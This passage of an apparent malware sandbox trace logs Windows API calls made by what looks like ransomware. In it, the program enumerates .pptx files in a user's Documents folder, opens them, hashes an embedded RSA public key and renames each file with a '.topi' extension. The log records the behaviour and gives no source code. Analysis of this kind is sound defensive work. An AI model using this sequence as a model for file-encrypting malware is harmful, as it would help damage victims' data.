(HeapHandle=0x680000, Flags=0x0, Size=0x8e) returned 0x31b3f60 [0095.130] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.130] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RSZwHHbt_h.pptx") returned=".pptx" [0095.130] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RSZwHHbt_h.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rszwhhbt_h.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.130] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=11302) returned 1 [0095.130] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.133] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x2c00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.133] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.134] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.134] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.134] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x2c26, lpOverlapped=0x0) returned 1 [0095.134] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.134] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.134] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.134] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0095.135] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.135] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.135] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.135] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.135] GetLastError () returned 0x0 [0095.135] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.135] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0095.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.136] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.136] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.136] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c30) returned 0x99f72d8 [0095.136] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1890 [0095.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9348 [0095.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f18d8 [0095.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9360 [0095.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9390 [0095.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93a8 [0095.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.136] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0095.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9390 | out: hHeap=0x680000) returned 1 [0095.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93a8 | out: hHeap=0x680000) returned 1 [0095.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0095.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d93a8 [0095.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0095.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9390 [0095.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0095.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93a8 | out: hHeap=0x680000) returned 1 [0095.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9390 | out: hHeap=0x680000) returned 1 [0095.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0095.137] GetCurrentThreadId () returned 0x8c4 [0095.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f5b60 [0095.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0095.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.137] GetCurrentThreadId () returned 0x8c4 [0095.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb510 [0095.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9390 [0095.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0095.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93a8 [0095.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9378 [0095.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.139] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RSZwHHbt_h.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rszwhhbt_h.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RSZwHHbt_h.pptx.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rszwhhbt_h.pptx.topi")) returned 1 [0095.139] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.139] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.139] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.140] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0095.140] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f5efd0, ftCreationTime.dwHighDateTime=0x1d53c0c, ftLastAccessTime.dwLowDateTime=0x143b0f90, ftLastAccessTime.dwHighDateTime=0x1d5ba07, ftLastWriteTime.dwLowDateTime=0x143b0f90, ftLastWriteTime.dwHighDateTime=0x1d5ba07, nFileSizeHigh=0x0, nFileSizeLow=0x17e3f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tdeX 3--r7K2XLPqxP4.pptx", cAlternateFileName="TDEX3-~1.PPT")) returned 1 [0095.140] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tdeX 3--r7K2XLPqxP4.pptx") returned=".pptx" [0095.141] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tdeX 3--r7K2XLPqxP4.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tdex 3--r7k2xlpqxp4.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.141] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=97855) returned 1 [0095.141] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.143] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x17e19, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.143] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.145] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0095.145] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.145] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.145] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.146] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.146] GetLastError () returned 0x0 [0095.146] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.146] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0095.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.146] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.146] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.146] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x17e40) returned 0x9a06a00 [0095.146] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f18d8 [0095.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9360 [0095.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1920 [0095.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9378 [0095.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93a8 [0095.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93c0 [0095.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.147] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0095.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93a8 | out: hHeap=0x680000) returned 1 [0095.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93c0 | out: hHeap=0x680000) returned 1 [0095.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0095.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d93c0 [0095.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0095.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d93a8 [0095.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0095.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93c0 | out: hHeap=0x680000) returned 1 [0095.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93a8 | out: hHeap=0x680000) returned 1 [0095.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0095.148] GetCurrentThreadId () returned 0x8c4 [0095.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f5bf0 [0095.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0095.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.148] RtlAllocateHeap (HeapHandle=0x680000, 